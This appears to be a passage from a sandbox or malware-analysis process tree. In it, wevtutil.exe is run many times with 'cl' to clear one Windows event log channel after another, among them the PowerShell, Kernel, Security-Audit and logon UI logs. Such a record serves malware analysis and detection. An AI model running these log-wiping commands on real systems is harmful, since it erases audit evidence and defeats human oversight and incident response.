wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
3⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
3⤵
PID:1804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
3⤵
PID:968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
3⤵
PID:1804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
3⤵
PID:968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
3⤵
PID:1804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
3⤵
PID:968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
3⤵
PID:1804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
3⤵
PID:1804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:1768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:1540

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
PID:740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
3⤵
PID:1832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
3⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:2000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:1836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
3⤵
PID:1832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
3⤵
PID:1584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
3⤵
PID:944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
3⤵
PID:2040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
3⤵
PID:1996

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
3⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
3⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
3⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
3⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
3⤵
PID:1680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
3⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:1356

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
3⤵
PID:704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
3⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:1348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
3⤵
PID:1360

C:\Windows\system32\wevtutil.exe
